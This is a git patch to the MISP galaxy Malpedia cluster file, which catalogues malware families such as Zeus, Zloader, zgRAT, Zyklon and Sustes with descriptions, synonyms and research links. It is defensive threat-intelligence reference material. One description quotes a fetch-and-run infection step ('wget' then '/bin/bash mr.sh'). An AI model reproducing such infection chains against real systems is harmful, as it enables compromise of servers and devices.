"https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf", + "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html", "http://www.secureworks.com/research/threat-profiles/gold-evergreen", - "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", - "http://eternal-todo.com/blog/new-zeus-binary", + "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite", + "https://nakedsecurity.sophos.com/2010/07/24/sample-run/", + "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html", + "https://blog.malwarebytes.com/101/2021/07/the-life-and-death-of-the-zeus-trojan/", + "http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20", - "https://www.secureworks.com/research/threat-profiles/gold-evergreen", - "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/", - "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", + "http://eternal-todo.com/blog/new-zeus-binary", + "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html", + "http://eternal-todo.com/blog/zeus-spreading-facebook", "https://securelist.com/financial-cyberthreats-in-2020/101638/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", "https://www.anomali.com/files/white-papers/russian-federation-country-profile.pdf", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" + "https://www.crowdstrike.com/cybersecurity-101/malware/trojan-zeus-malware", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://www.s21sec.com/en/zeus-the-missing-link/", + "https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/", + "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", + "https://www.secureworks.com/research/zeus?threat=zeus", + "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html", + "https://www.wired.com/2017/03/russian-hacker-spy-botnet/", + "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.secureworks.com/research/threat-profiles/gold-evergreen", + "https://unit42.paloaltonetworks.com/banking-trojan-techniques/", + "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html" ], "synonyms": [ "Zbot" @@ -51942,9 +54464,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_openssl", - "https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/", "https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/", - "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/" + "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/", + "https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/" ], "synonyms": [ "XSphinx" @@ -51959,9 +54481,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx", - "https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/", "https://securityintelligence.com/posts/zeus-sphinx-back-in-business-some-core-modifications-arise/", - "https://securityaffairs.co/wordpress/39592/cyber-crime/sphinx-variant-zeus-trojan.html" + "https://securityaffairs.co/wordpress/39592/cyber-crime/sphinx-variant-zeus-trojan.html", + "https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/" ], "synonyms": [], "type": [] @@ -51983,10 +54505,13 @@ "value": "Zezin" }, { - "description": "", + "description": "zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.\r\nUsually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat", + "https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/", + "https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US", + "https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities", "https://bazaar.abuse.ch/browse/signature/zgRAT/" ], "synonyms": [], @@ -52072,88 +54597,88 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader", - "https://blag.nullteilerfrei.de/2020/06/11/api-hashing-in-the-zloader-malware/", - "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", - "https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/", - "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", - "https://info.phishlabs.com/blog/surge-in-zloader-attacks-observed", "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", - "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/", - "https://blag.nullteilerfrei.de/2020/05/24/zloader-string-obfuscation/", - "https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/", - "https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit", - "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/", - "https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks", - "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/", - "https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/", - "https://www.sentinelone.com/labs/hide-and-seek-new-zloader-infection-chain-comes-with-improved-stealth-and-evasion-mechanisms/", - "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/", - "https://noticeofpleadings.com/zloader/", - "https://labs.k7computing.com/?p=22458", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://blogs.quickheal.com/zloader-entailing-different-office-files/", - "https://documents.trendmicro.com/assets/txt/IOCs-zloader-campaigns-at-a-glance.txt", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", - "https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems", - "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware", - "https://www.hornetsecurity.com/en/threat-research/zloader-email-campaign-using-mhtml-to-download-and-decrypt-xls/", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://cybleinc.com/2021/04/19/zloader-returns-through-spelevo-exploit-kit-phishing-campaign/", - "https://securityintelligence.com/around-the-world-with-zeus-sphinx-from-canada-to-australia-and-back/", - "https://clickallthethings.wordpress.com/2020/06/19/zloader-vba-r1c1-references-and-other-tomfoolery/", - "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain", "https://www.forcepoint.com/blog/x-labs/invoicing-spam-campaigns-malware-zloader", - "https://blog.alyac.co.kr/3322", - "https://blog.vincss.net/2022/04/re026-a-deep-dive-into-zloader-the-silent-night.html", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/zloader-campaigns-at-a-glance", + "https://blog.malwarebytes.com/threat-analysis/2020/11/malsmoke-operators-abandon-exploit-kits-in-favor-of-social-engineering-scheme/", + "https://blag.nullteilerfrei.de/2020/05/24/zloader-string-obfuscation/", + "https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/", + "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://clickallthethings.wordpress.com/2020/09/21/zloader-xlm-update-macro-code-and-behavior-change/", "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", - "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", "https://securityliterate.com/chantays-resume-investigating-a-cv-themed-zloader-malware-campaign/", - "https://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/", - "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/", - "https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-again-new-zloader-variant-returns", - "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries", - "https://twitter.com/VK_Intel/status/1294320579311435776", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", - "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", + "https://documents.trendmicro.com/assets/txt/IOCs-zloader-campaigns-at-a-glance.txt", + "https://labs.k7computing.com/?p=22458", + "https://noticeofpleadings.com/zloader/", + "https://www.hornetsecurity.com/en/threat-research/zloader-email-campaign-using-mhtml-to-download-and-decrypt-xls/", + "https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems", + "https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/zloader-campaigns-at-a-glance", + "https://web.archive.org/web/20200929145931/https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/", + "https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/", + "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/", + "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/", + "https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/", + "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", "https://securityintelligence.com/zeus-sphinx-pushes-empty-configuration-files-what-has-the-sphinx-got-cooking/", + "https://blog.vincss.net/2022/04/re026-a-deep-dive-into-zloader-the-silent-night.html", + "https://twitter.com/VK_Intel/status/1294320579311435776", + "https://www.youtube.com/watch?v=QBoj6GB79wM", + "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/", + "https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit", + "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/", + "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/", "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", - "https://www.youtube.com/watch?v=QBoj6GB79wM", + "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/", + "https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/", + "https://securityintelligence.com/around-the-world-with-zeus-sphinx-from-canada-to-australia-and-back/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://twitter.com/ffforward/status/1324281530026524672", - "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/", - "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", - "https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html", - "https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/", - "https://unit42.paloaltonetworks.com/api-hammering-malware-families/", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489", - "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", - "https://johannesbader.ch/blog/the-dga-of-zloader/", - "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://aaqeel01.wordpress.com/2021/10/18/zloader-reversing/", + "https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks", + "https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/", + "https://www.sentinelone.com/labs/hide-and-seek-new-zloader-infection-chain-comes-with-improved-stealth-and-evasion-mechanisms/", + "https://info.phishlabs.com/blog/zloader-dominates-email-payloads-in-q1", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://johannesbader.ch/blog/the-dga-of-zloader/", + "https://clickallthethings.wordpress.com/2020/06/19/zloader-vba-r1c1-references-and-other-tomfoolery/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", + "https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-again-new-zloader-variant-returns", + "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://www.youtube.com/watch?v=mhX-UoaYnOM", + "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain", + "https://cybleinc.com/2021/04/19/zloader-returns-through-spelevo-exploit-kit-phishing-campaign/", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", + "https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html", + "https://info.phishlabs.com/blog/surge-in-zloader-attacks-observed", + "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/", + "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", + "https://blog.alyac.co.kr/3322", + "https://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/", + "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", + "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", + "https://unit42.paloaltonetworks.com/api-hammering-malware-families/", + "https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/", "https://www.lac.co.jp/lacwatch/people/20201106_002321.html", "https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", - "https://blog.malwarebytes.com/threat-analysis/2020/11/malsmoke-operators-abandon-exploit-kits-in-favor-of-social-engineering-scheme/", - "https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/", - "https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/", - "https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/", - "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://web.archive.org/web/20200929145931/https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/", - "https://info.phishlabs.com/blog/zloader-dominates-email-payloads-in-q1", - "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex" + "https://blag.nullteilerfrei.de/2020/06/11/api-hashing-in-the-zloader-malware/", + "https://blogs.quickheal.com/zloader-entailing-different-office-files/", + "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", + "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", + "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", + "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries" ], "synonyms": [ "DELoader", @@ -52199,8 +54724,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zumanek", - "https://www.welivesecurity.com/br/2018/01/17/zumanek-malware-tenta-roubar-credenciais-de-servicos/", - "https://www.welivesecurity.com/2021/12/15/dirty-dozen-latin-america-amavaldo-zumanek/" + "https://www.welivesecurity.com/2021/12/15/dirty-dozen-latin-america-amavaldo-zumanek/", + "https://www.welivesecurity.com/br/2018/01/17/zumanek-malware-tenta-roubar-credenciais-de-servicos/" ], "synonyms": [], "type": [] @@ -52243,21 +54768,22 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell", "https://content.fireeye.com/apt-41/rpt-apt41", - "https://attack.mitre.org/groups/G0096", - "https://lab52.io/blog/apt27-rootkit-updates/", - "https://meltx0r.github.io/tech/2019/09/19/emissary-panda-apt.html", "https://mp.weixin.qq.com/s/K1uBLGqD8kgsIp1yTyYBfw", - "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-keystone", - "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-union", - "https://github.com/smb01/zxshell", - "https://blogs.cisco.com/security/talos/opening-zxshell", - "https://attack.mitre.org/groups/G0001/", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", - "https://unit42.paloaltonetworks.com/atoms/iron-taurus/", + "https://attack.mitre.org/groups/G0096", + "https://risky.biz/whatiswinnti/", "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", - "https://risky.biz/whatiswinnti/" + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf", + "https://attack.mitre.org/groups/G0001/", + "https://meltx0r.github.io/tech/2019/09/19/emissary-panda-apt.html", + "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://unit42.paloaltonetworks.com/atoms/iron-taurus/", + "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf", + "https://github.com/smb01/zxshell", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor", + "https://blogs.cisco.com/security/talos/opening-zxshell", + "https://www.secureworks.com/research/threat-profiles/bronze-keystone", + "https://lab52.io/blog/apt27-rootkit-updates/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf" ], "synonyms": [ "Sensocode" @@ -52284,7 +54810,7 @@ "value": "ZxxZ" }, { - "description": "", + "description": "According to FireEye, Zyklon or Zyklon HTTP is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal. The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so. The malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery, from browsers and email software. Zyklon also provides a very efficient mechanism to monitor the spread and impact.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zyklon", @@ -52298,5 +54824,5 @@ "value": "Zyklon" } ], - "version": 17779 -} + "version": 19000 +} From 5d01afb537176bd841a6be37767213582366d6e2 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Tue, 26 Sep 2023 10:48:49 +0200 Subject: [PATCH 04/16] chg: [malpedia] jq all the things --- clusters/malpedia.json | 220 ++++++++++++++++++++--------------------- 1 file changed, 110 insertions(+), 110 deletions(-) diff --git a/clusters/malpedia.json b/clusters/malpedia.json index 46f5e10..29d50a2 100644 --- a/clusters/malpedia.json +++ b/clusters/malpedia.json @@ -1362,7 +1362,7 @@ "value": "FluBot" }, { - "description": "According to Check Point, this malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs. These malicious apps steal the victims\u2019 credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware can remain undetected for months making it a persistent, dangerous, and hard-to-spot threat.", + "description": "According to Check Point, this malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs. These malicious apps steal the victims’ credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware can remain undetected for months making it a persistent, dangerous, and hard-to-spot threat.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fluhorse", @@ -1851,7 +1851,7 @@ "value": "JadeRAT" }, { - "description": "Joker is one of the most well-known malware families on Android devices. It manages to take advantage of Google\u2019s official app store with the help of its trail signatures which includes updating the virus\u2019s code, execution process, and payload-retrieval techniques. This malware is capable of stealing users\u2019 personal information including contact details, device data, WAP services, and SMS messages.", + "description": "Joker is one of the most well-known malware families on Android devices. It manages to take advantage of Google’s official app store with the help of its trail signatures which includes updating the virus’s code, execution process, and payload-retrieval techniques. This malware is capable of stealing users’ personal information including contact details, device data, WAP services, and SMS messages.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.joker", @@ -2028,7 +2028,7 @@ "value": "Marcher" }, { - "description": "According to heimdal, MasterFred malware, this is designed as an Android trojan that makes use of false login overlays to target not only Netflix, Instagram, and Twitter users, but also bank customers. The hackers\u2019 goal is to steal credit card information.", + "description": "According to heimdal, MasterFred malware, this is designed as an Android trojan that makes use of false login overlays to target not only Netflix, Instagram, and Twitter users, but also bank customers. The hackers’ goal is to steal credit card information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.masterfred", @@ -2967,7 +2967,7 @@ "value": "Triada" }, { - "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware\u2019s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", + "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout" @@ -4852,7 +4852,7 @@ "value": "FontOnLake" }, { - "description": "Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine\u2019s disk. ", + "description": "Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine’s disk. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fritzfrog", @@ -5188,7 +5188,7 @@ "value": "Hive (ELF)" }, { - "description": "Checkpoint Research describes this as part of a custom firmware image affiliated with the Chinese state-sponsored actor \u201cCamaro Dragon\u201d, a custom MIPS32 ELF implant. HorseShell, the main implant inserted into the modified firmware by the attackers, provides the attacker with 3 main functionalities:\r\n* Remote shell: Execution of arbitrary shell commands on the infected router\r\n* File transfer: Upload and download files to and from the infected router.\r\n* SOCKS tunneling: Relay communication between different clients.", + "description": "Checkpoint Research describes this as part of a custom firmware image affiliated with the Chinese state-sponsored actor “Camaro Dragon”, a custom MIPS32 ELF implant. HorseShell, the main implant inserted into the modified firmware by the attackers, provides the attacker with 3 main functionalities:\r\n* Remote shell: Execution of arbitrary shell commands on the infected router\r\n* File transfer: Upload and download files to and from the infected router.\r\n* SOCKS tunneling: Relay communication between different clients.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.horseshell", @@ -5667,7 +5667,7 @@ "https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/" ], "synonyms": [ - "M\u00e9lof\u00e9e" + "Mélofée" ], "type": [] }, @@ -6259,7 +6259,7 @@ "value": "pupy (ELF)" }, { - "description": "The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:\r\n\r\n1. The ransom note was included solely as a text file, without any message on the screen\u2014naturally, because it is a server and not an endpoint.\r\n\r\n2. Every victim is provided with a different, unique Bitcoin wallet\u2014this could help the attackers avoid being traced.\r\n\r\n3. Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.", + "description": "The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:\r\n\r\n1. The ransom note was included solely as a text file, without any message on the screen—naturally, because it is a server and not an endpoint.\r\n\r\n2. Every victim is provided with a different, unique Bitcoin wallet—this could help the attackers avoid being traced.\r\n\r\n3. Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.qnapcrypt", @@ -6476,7 +6476,7 @@ "value": "RedAlert Ransomware" }, { - "description": "A Trojan for Linux intended to infect machines with the SPARC architecture and Intel x86, x86-64 computers. The Trojan\u2019s configuration data is stored in a file encrypted with XOR algorithm", + "description": "A Trojan for Linux intended to infect machines with the SPARC architecture and Intel x86, x86-64 computers. The Trojan’s configuration data is stored in a file encrypted with XOR algorithm", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rekoobe", @@ -6945,7 +6945,7 @@ "value": "Sunless" }, { - "description": "Sustes Malware doesn\u2019t infect victims by itself (it\u2019s not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software. ", + "description": "Sustes Malware doesn’t infect victims by itself (it’s not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. 